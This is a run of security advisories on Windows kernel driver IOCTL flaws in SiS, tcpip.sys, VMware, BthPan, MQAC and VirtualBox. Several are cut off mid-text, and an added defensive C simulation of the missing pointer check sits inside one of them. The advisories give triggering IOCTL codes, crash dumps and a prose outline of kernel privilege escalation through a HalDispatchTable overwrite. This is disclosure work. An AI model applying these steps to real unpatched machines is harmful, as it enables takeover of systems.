Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-003.txt

1. Vulnerability Details

Affected Vendor: Silicon Integrated Systems Corporation
Affected Product: Windows VGA Display Manager
Affected Version: 6.14.10.3930
Platform: Microsoft Windows 7 (x86), Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where condition
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-5465

2. Vulnerability Description

Vulnerabilities within the srvkp module allow an attacker to inject memory they control into an arbitrary location they define or cause memory corruption. IOCTL request codes 0x96002400 and 0x96002404 have been demonstrated to trigger these vulnerabilities. These vulnerabilities can be used to obtain control of code flow in a privileged process and ultimately be used to escalate the privilege of an attacker.

3. Technical Description

Example against Windows XP:

Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 50, {, 1, 804f3b76, 0}

Probably caused by : srvkp.sys ( srvkp+3329 )

Followup: MachineOwner
---------

kd> kn

Call stack:

 # ChildEBP RetAddr
00 f6a529a0 8051cc7f nt!KeBugCheckEx+0x1b
01 f6a52a00 805405d4 nt!MmAccessFault+0x8e7
02 f6a52a00 804f3b76 nt!KiTrap0E+0xcc
03 f6a52ad0 804fdaf1 nt!IopCompleteRequest+0x92
04 f6a52b20 806d3c35 nt!KiDeliverApc+0xb3
05 f6a52b20 806d3861 hal!HalpApcInterrupt+0xc5
06 f6a52ba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11
07 f6a52bc8 804f07e4 nt!KeInsertQueueApc+0x4b
08 f6a52bfc f7910329 nt!IopfCompleteRequest+0x1d8
09 f6a52c34 804ee129 srvkp+0x3329
0a f6a52c44 80574e56 nt!IopfCallDriver+0x31
0b f6a52c58 80575d11 nt!IopSynchronousServiceTail+0x70
0c f6a52d00 8056e57c nt!IopXxxControlFile+0x5e7
0d f6a52d34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
0e f6a52d34 7c90e514 nt!KiFastCallEntry+0xf8
0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
15 0021f6c0 1e07bd9c _ctypes+0x54d8
16 python27!PyObject_Call+0x4c

Example against Windows 7:

Microsoft (R) Windows Debugger Version 6.2.9200.20512 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Loading Dump File [C:\Windows\MEMORY.DMP]
Kernel Summary Dump File: Only kernel address space is available

Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
*********************************************************************
* Symbols can not be loaded because symbol path is not initialized. *
*                                                                   *
* The Symbol Path can be set by:                                    *
*   using the _NT_SYMBOL_PATH environment variable.                 *
*   using the -y argument when starting the debugger.               *
*   using .sympath and .sympath+                                    *
*********************************************************************
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntkrpamp.exe -
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850
Machine Name:
Kernel base = 0x82a12000 PsLoadedModuleList = 0x82b5c850
Debug session time: Mon Aug 17 14:36:36.286 2015 (UTC - 7:00)
System Uptime: 0 days 11:46:55.313
KL-001-2015-001 : Windows 2003 tcpip.sys Privilege Escalation
KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation

Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-001
Publication Date: 2015.01.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt

1. Vulnerability Details

Affected Vendor: Microsoft
Affected Product: TCP/IP Protocol Driver
Affected Version: 5.2.3790.4573
Platform: Microsoft Windows Server 2003 Service Pack 2
Architecture: x86, x64, Itanium
Impact: Privilege Escalation
Attack vector: IOCTL
CVE-ID: CVE-2014-4076

2. Vulnerability Description

The tcpip.sys driver fails to sufficiently validate memory objects used during the processing of a user-provided IOCTL.

3. Technical Description

By crafting an input buffer that will be passed to the Tcp device through the NtDeviceIoControlFile() function, it is possible to trigger a vulnerability that would allow an attacker to elevate privileges.

This vulnerability was discovered while fuzzing the tcpip.sys driver. A collection of IOCTLs that could be targeted was obtained and subsequently fuzzed. During this process, one of the crashes obtained originated from the IOCTL 0x00120028. This was performed on an x86 installation of Windows Server 2003, Service Pack 2.

ErrCode =
eax= ebx=859ef888 ecx=0008 edx=0100 esi= edi=80a58270
eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010246
tcpip!SetAddrOptions+0x1d:
f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:0028=

A second chance exception has occurred during a mov instruction. This instruction is attempting to copy a pointer value from an unallocated address space. Since no pointer can be found, an exception is generated.

Let's begin by reviewing the call stack:

kd> kv
  *** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr  Args to Child
f620a9dc f67e416b f620aa34 0022 0004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo])
f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo])
f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo])
f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo])
f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo])
f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo])
f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo])
f620ab5c 808e912e 06f4 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo])
f620ab90 f55c10fa 06f4 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo])

The nt!NtDeviceIoControlFile() function was called, creating a chain of subsequent function calls that eventually led to the tcpip!SetAddrOptions() function being called. By deconstructing the call to nt!NtDeviceIoControlFile() we can derive all the information required to recreate this exception.

0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a
eax= ebx=8c785070 ecx= edx= esi= edi=
eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010246
nt!NtDeviceIoControlFile+0x2a:
808e912e 5d pop ebp

kd> db [ebp+2C] L?0x4
b940dd60 00 00 00 00
kd> db [ebp+28] L?0x4
b940dd5c 00 00 00 00
kd> db [ebp+24] L?0x4
b940dd58 20 00 00 00 ...
kd> db [ebp+20] L?0x4
b940dd54 00 11 00 00
kd> db [ebp+1c] L?0x4
b940dd50 28 00 12 00 (...
kd> db [ebp+18] L?0x4
b940dd4c 58 4f bd 00 XO..
kd> db [ebp+14] L?0x4
b940dd48 00 00 00 00
kd> db [ebp+10] L?0x4
b940dd44 00 00 00 00
kd> db [ebp+0c] L?0x4
b940dd40 00 00 00 00
kd> db [ebp+8] L?0x4
b940dd3c b8 06 00 00

The inputBuffer for this call references memory at 0x1000 with a length of 0x20.

kd> db 0x1100 L?0x20
1100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00
1110 22 00 00 00 04 00 00 00-00 00 01
KL-001-2014-004 : VMWare vmx86.sys Arbitrary Kernel Read
Title: VMWare vmx86.sys Arbitrary Kernel Read
Advisory ID: KL-001-2014-004
Publication Date: 2014.11.04
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-004.txt

1. Vulnerability Details

Affected Vendor: VMWare
Affected Product: Workstation
Affected Version: 10.0.0.40273
Platform: Microsoft Windows XP SP3 x86, Microsoft Windows Server 2003 SP2 x86, Microsoft Windows 7 SP1 x86
CWE Classification: CWE-20: Improper Input Validation
Impact: Arbitrary Read, Denial-of-Service
Attack vector: IOCTL

2. Vulnerability Description

A vulnerability within the vmx86 driver allows an attacker to specify a memory address within the kernel and have the memory stored at that address be returned to the attacker.

3. Technical Description

The first four bytes of the InputBuffer parameter passed to DeviceIoControl are used as the source parameter in a memcpy call. The InputBuffer must be a minimum of eight bytes long in order to trigger the vulnerability. The OutputBuffer parameter passed to DeviceIoControl is used as the destination address for the output from the DeviceIoControl call. In this case, the data returned is the same data residing at the source parameter of memcpy. This can therefore be abused in a way that allows an attacker to arbitrarily define a kernel address, and have the memory stored at that address be returned to the attacker at an address residing in userland.

Probably caused by : vmx86.sys ( vmx86+bd6 )

Followup: MachineOwner
---------

kd> .symfix;.reload;!analyze -v
Loading Kernel Symbols
...
...
Loading User Symbols
.
Loading unloaded module list
.
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: , memory referenced.
Arg2: , value 0 = read operation, 1 = write operation.
Arg3: 82c727f3, If non-zero, the instruction address which referenced the bad memory address.
Arg4: , (reserved)

Debugging Details:
------------------

READ_ADDRESS:

FAULTING_IP:
nt!memcpy+33
82c727f3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: python.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.16384 (debuggers(dbg).130821-1623) x86fre

TRAP_FRAME: 822e47dc -- (.trap 0x822e47dc)
ErrCode =
eax=2000 ebx=87433558 ecx=0800 edx= esi= edi=856a9000
eip=82c727f3 esp=822e4850 ebp=822e4858 iopl=0 nv up ei pl nz ac po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010212
nt!memcpy+0x33:
82c727f3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope

LAST_CONTROL_TRANSFER: from 82c7a3d8 to 82cc741b

STACK_TEXT:
822e47c4 82c7a3d8 nt!MmAccessFault+0x106
822e47c4 82c727f3 nt!KiTrap0E+0xdc
822e4858 93572bd6 856a9000 2000 nt!memcpy+0x33
822e48cc 9357329a 856a9000 0008 856a9000 vmx86+0xbd6
822e48f8 82c70593 86f0d030 87433540 87433540 vmx86+0x129a
822e4910 82e6499f 871f8b08 87433540 874335b0 nt!IofCallDriver+0x63
822e4930 82e67b71 86f0d030 871f8b08 nt!IopSynchronousServiceTail+0x1f8
822e49cc 82eae3f4 86f0d030 87433540 nt!IopXxxControlFile+0x6aa
822e4a00 821210fa 007c nt!NtDeviceIoControlFile+0x2a
822e4b14 82cb7685 nt!KiDeliverApc+0x17f
822e4b58 82cb64f7 85689a10 8000 nt!KiSwapThread+0x24e
822e4b80 82cb61d5 85689a10 85689ad0 008a nt!KiCommitThreadWait+0x1df
822e4bd8 82e639fd 01b1fd01 0001 822e4bc8 nt!KeDelayExecutionThread+0x2aa
822e4c24 82c771ea 0001 01b1ff54 01b1ff78 nt!NtDelayExecution+0x8d
822e4c24 777c70b4 0001 01b1ff54 01b1ff78 nt!KiFastCallEntry+0x12a
01b1ff0c 777c57d4 75a31876 0001 01b1ff54 ntdll!KiFastSystemCallRet
01b1ff10 75a31876 0001 01b1ff54 da57de5e ntdll!NtDelayExecution+0xc
01b1ff78 00401ed6 0001 01b1ff94 KERNELBASE!SleepEx+0x65
01b1ff94 777e37f5 762fe46a kernel32!BaseThreadInitThunk+0xe
01b1ffd4 777e37c8 00401ec0 ntdll!__RtlUserThreadStart+0x70
KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-002
Publication Date: 2014-07-18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt

1. Vulnerability Details

Affected Vendor: Microsoft
Affected Product: Bluetooth Personal Area Networking
Affected Versions: 5.1.2600.5512
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971

2. Vulnerability Description

A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the BthPan device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0012b814 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it.

A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0x.

STACK_TEXT:
b1e065b8 8051cc7f 0050 0001 nt!KeBugCheckEx+0x1b
b1e06618 805405d4 0001 nt!MmAccessFault+0x8e7
b1e06618 804f3b76 0001 nt!KiTrap0E+0xcc
b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92
b1e06738 80541890 nt!KiDeliverApc+0xb3
b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8
b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25
b1e0677c f83e26ec 81f7a290 b1e067a8 nt!ExQueueWorkItem+0x1b
b1e0678c b272b5a1 81f7a288 81e002d8 NDIS!NdisScheduleWorkItem+0x21
b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b
b1e069e8 b273a62b 8216cc40 0258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8
b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93
b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48
b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c
b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31
b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70
b1e06b80 8056e57c 06a8 nt!IopXxxControlFile+0x5e7
b1e06bb4 b1a2506f 06a8 nt!NtDeviceIoControlFile+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.

Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the bthpan driver.

FOLLOWUP_IP:
bthpan!BthpanReqAdd+16b
b272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

TRAP_FRAME: b1e06630 -- (.trap 0xb1e06630)
ErrCode = 0002
eax=006a ebx=8216cc40 ecx=001a edx=0001 esi=81e002d8 edi=
eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010203
nt!IopCompleteRequest+0x92:
804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in BthPan it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

None. A patch is not likely to be forthcoming from the vendor.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of
KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-003
Publication Date: 2014.07.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt

1. Vulnerability Details

Affected Vendor: Microsoft
Affected Product: MQ Access Control
Affected Versions: 5.1.0.1110
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971

2. Vulnerability Description

A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the MQAC device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x1965020f the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it.

A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0x.

STACK_TEXT:
b1c4594c 8051cc7f 0050 0001 nt!KeBugCheckEx+0x1b
b1c459ac 805405d4 0001 nt!MmAccessFault+0x8e7
b1c459ac b230af37 0001 nt!KiTrap0E+0xcc
b1c45a68 b230c0a1 00d3 000c mqac!AC2QM+0x5d
b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d
b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31
b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70
b1c45b80 8056e57c 06a4 nt!IopXxxControlFile+0x5e7
b1c45bb4 b1aea17e 06a4 nt!NtDeviceIoControlFile+0x2a

Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the mqac driver.

FOLLOWUP_IP:
mqac!AC2QM+5d
b230af37 891e mov dword ptr [esi],ebx

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

TRAP_FRAME: b1c459c4 -- (.trap 0xb1c459c4)
ErrCode = 0002
eax=b1c45a58 ebx= ecx= edx=82377e48 esi= edi=
eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010246
mqac!AC2QM+0x5d:
b230af37 891e mov dword ptr [esi],ebx ds:0023:=

A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in MQAC it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

None. A patch is not likely to be forthcoming from the vendor.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have
KL-001-2014-001 : Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation
Title: Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-001 Publication Date: 07.15.2014 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt 1. Vulnerability Details Affected Vendor: Oracle Affected Product: VirtualBox Guest Additions Affected Versions: 4.3.8 - 4.3.10 Platform: Microsoft XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Arbitrary code execution Attack vector: IOCTL CVE ID: CVE-2014-2477 2. Vulnerability Description A vulnerability within VBoxGuest module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the VBoxGuest device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0022a040 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classicaly known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0x. 
STACK_TEXT:
f824a9d4 805241e0 0050 0001 nt!KeBugCheckEx+0x1b
f824aa20 804e172b 0001 nt!MmAccessFault+0x6f5
f824aa20 804eca3b 0001 nt!KiTrap0E+0xcc
f824aaf0 804ecaba ffa74248 f824ab3c f824ab30 nt!IopCompleteRequest+0x92
f824ab40 806f5c0e f824ab58 nt!KiDeliverApc+0xb3
f824ab40 806f00b3 f824ab58 hal!HalpApcInterrupt2ndEntry+0x31
f824abcc 804e546c ffa74248 ffa74208 hal!KfLowerIrql+0x43
f824abec 804ecad4 ffa74248 811772d8 nt!KeInsertQueueApc+0x4b
f824ac20 faa36123 811772d8 81297558 nt!IopfCompleteRequest+0x1d8
f824ac34 804e3807 008c 008c 806f0070 VBoxGuest+0x1123
f824ac44 80568191 ffa7429c 811772d8 ffa74208 nt!IopfCallDriver+0x31
f824ac58 805770ca 812971a8 ffa74208 811772d8 nt!IopSynchronousServiceTail+0x70
f824ad00 805795e3 0058 nt!IopXxxControlFile+0x611
f824ad34 804de7ec 0058 nt!NtDeviceIoControlFile+0x2a
f824ad34 7c90e526 0058 nt!KiFastCallEntry+0xf8
0021fa54 7c90d28a 1d1adc9a 0058 ntdll!KiIntSystemCall+0x6
0021fa58 1d1adc9a 0058 ntdll!ZwDeviceIoControlFile+0xc

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

ErrCode = 0002
eax=008c ebx=ffa74208 ecx=0023 edx= esi=811eabf0 edi= eip=804eca3b esp=f824aaac ebp=f824aaf0 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010202
nt!IopCompleteRequest+0x92:
0008:804eca3b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process.
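The root cause described above is a copy into a caller-chosen OutputBuffer address that the driver never validated. The following is an added example, not code from VirtualBox, VBoxGuest, or Windows: a user-mode simulation in which two static arrays stand in for the user and kernel address ranges, a vulnerable handler copies straight to the supplied pointer, and a hardened handler first applies the range test that ProbeForWrite() performs on Windows (destination range entirely in user space, no wrap-around). The names probe_for_write, ioctl_handler_vulnerable, ioctl_handler_hardened, the sentinel offset, and the STATUS_* values are all constructed for this illustration.

```c
/*
 * Added example, not code from VirtualBox, VBoxGuest or Windows. A user-mode
 * simulation of the missing check behind a write-what-where in an IOCTL
 * handler: the handler copies the caller's InputBuffer to the caller-chosen
 * OutputBuffer address. The "address space" is two static arrays so that the
 * program runs anywhere; probe_for_write() mirrors the range test that
 * ProbeForWrite() applies on Windows before a driver touches a user buffer.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define USER_SIZE   256
#define KERNEL_SIZE 256

/* Constructed address space: one arena for user mode, one for kernel mode. */
static uint8_t g_user[USER_SIZE];
static uint8_t g_kernel[KERNEL_SIZE];

/* Stand-in for a kernel dispatch-table entry that an unchecked write would
 * corrupt (constructed offset and value, not a real kernel address). */
#define SENTINEL_OFF 0x40
static const uint32_t SENTINEL = 0xC0DEC0DEu;

/* Status codes in the style of NTSTATUS; the numeric values are simulation-only. */
enum { STATUS_SUCCESS = 0, STATUS_ACCESS_VIOLATION = -1, STATUS_BUFFER_TOO_SMALL = -2 };

void reset_memory(void) {
    memset(g_user, 0, sizeof g_user);
    memset(g_kernel, 0, sizeof g_kernel);
    memcpy(g_kernel + SENTINEL_OFF, &SENTINEL, sizeof SENTINEL);
}

/* Equivalent of ProbeForWrite(): the whole range [out, out+len) must lie in
 * the user arena and must not wrap. uintptr_t arithmetic keeps the comparison
 * well defined even when `out` points into an unrelated object. */
int probe_for_write(const void *out, size_t len) {
    uintptr_t lo = (uintptr_t)out;
    uintptr_t base = (uintptr_t)g_user;
    if (len == 0) return STATUS_SUCCESS;                 /* nothing to write */
    if (lo + len < lo) return STATUS_ACCESS_VIOLATION;   /* wrap-around */
    if (lo < base || lo + len > base + USER_SIZE) return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* Vulnerable pattern: trusts the caller-supplied OutputBuffer pointer. */
int ioctl_handler_vulnerable(const void *in, size_t in_len, void *out, size_t out_len) {
    if (out_len < in_len) return STATUS_BUFFER_TOO_SMALL;
    memcpy(out, in, in_len);   /* write-what-where: `out` is chosen by the caller */
    return STATUS_SUCCESS;
}

/* Hardened pattern: probe the destination range before any copy. */
int ioctl_handler_hardened(const void *in, size_t in_len, void *out, size_t out_len) {
    int st = probe_for_write(out, out_len);
    if (st != STATUS_SUCCESS) return st;
    if (out_len < in_len) return STATUS_BUFFER_TOO_SMALL;
    memcpy(out, in, in_len);
    return STATUS_SUCCESS;
}

uint32_t read_sentinel(void) {
    uint32_t v;
    memcpy(&v, g_kernel + SENTINEL_OFF, sizeof v);
    return v;
}

/* Runs both handlers against a kernel-range destination and a user-range one.
 * Returns 1 when the hardened handler refused the kernel write, kept the
 * sentinel intact, and still served the legitimate user-space request. */
int demo(void) {
    uint32_t payload = 0x41414141u;                  /* constructed "what" */
    void *kernel_target = g_kernel + SENTINEL_OFF;   /* constructed "where" */
    int ok = 1;
    int st;

    reset_memory();
    ioctl_handler_vulnerable(&payload, sizeof payload, kernel_target, sizeof payload);
    if (read_sentinel() == SENTINEL) ok = 0;         /* unchecked copy should clobber it */

    reset_memory();
    st = ioctl_handler_hardened(&payload, sizeof payload, kernel_target, sizeof payload);
    if (st != STATUS_ACCESS_VIOLATION || read_sentinel() != SENTINEL) ok = 0;

    st = ioctl_handler_hardened(&payload, sizeof payload, g_user + 16, sizeof payload);
    if (st != STATUS_SUCCESS || memcmp(g_user + 16, &payload, sizeof payload) != 0) ok = 0;
    return ok;
}

int main(void) {
    printf("hardened handler blocked the kernel-range write: %s\n", demo() ? "yes" : "no");
    return 0;
}
```

The point of the pair is that the copy itself is identical; only the probe of the destination range differs. In a real driver the probe must also run inside a __try/__except block, because ProbeForWrite() reports a bad address by raising an exception rather than returning a status, and the same care applies to the input pointer with ProbeForRead().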
By leveraging the vulnerability it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

The vendor has patched this vulnerability. The patch information is here: http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

04.28.14 - KoreLogic contacts Oracle with vulnerability report and PoC.
04.29.14 - Oracle acknowledges receipt of vulnerability report and PoC.
05.02.14 - Oracle assigns tracking to this vulnerability report and states that it will be patched in the CPU cycle, with credit for the report given to KoreLogic. Oracle also states monthly updates will be provided.
05.22.14 -
